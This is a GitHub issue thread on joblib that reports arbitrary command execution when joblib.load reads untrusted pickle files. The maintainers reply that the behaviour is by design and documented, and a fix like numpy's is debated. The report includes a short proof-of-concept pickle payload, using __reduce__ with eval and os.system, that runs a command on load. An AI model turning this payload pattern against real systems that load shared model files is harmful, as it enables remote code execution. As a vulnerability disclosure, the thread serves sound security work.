### ISSUE TITLE
joblib.load with evil data will cause command execution

### ISSUE THREAD

**Issue by Cossack9989** [joblib/joblib#977]
## Reproducing code example:
- `joblib.load` function with evil data will cause command execution due to `pickle.load` in `joblib/numpy_pickle.py`, if attack share evil data on internet, when user load it , it will cause command execution.
- for example, some online MachinLearning website using joblib may allow user to submit model. If evil model submmited, the website may suffer.
```python
import joblib
import pickle
class A(object):
    def __reduce__(self):
        return eval,("__import__('os').system('calc.exe')",)
x = [3.14]
x.append(A())
res = pickle.dumps(x)
open("test.pkl","wb").write(res)
joblib.load("test.pkl")
```
## version
<=0.14.1

**Comment by Cossack9989** [comment]
![1576205485(1)](https://user-images.githubusercontent.com/32336251/70765727-9298aa80-1d96-11ea-8e2e-2db5fd7f3b93.png)

**Comment by ogrisel** [comment]
Yes this is by design and it is properly documented at the top of the documentation for the persistence section of the documentation:

https://joblib.readthedocs.io/en/latest/persistence.html


> Warning
> 
> joblib.dump() and joblib.load() are based on the Python pickle serialization model, which means that arbitrary Python code can be executed when loading a serialized object with joblib.load().
> 
> joblib.load() should therefore never be used to load objects from an untrusted source or otherwise you will introduce a security vulnerability in your program.

**Comment by Cossack9989** [comment]
[bug report of numpy.load](https://bugzilla.suse.com/show_bug.cgi?id=1122208)
[issue of numpy.load](https://github.com/numpy/numpy/issues/12759)
why not fix this `joblib.load` like `numpy.load`?
and disable hasobject==true may be a solution
```python
        if self.dtype.hasobject:
            # The array contained Python objects. We need to unpickle the data.
            array = pickle.load(unpickler.file_handle)
```

**Comment by ogrisel** [comment]
The goal of joblib dump and load is to be able able to serialize and deserialize arbitrary Python objects (e.g. a scikit-learn estimators) not just numpy arrays.
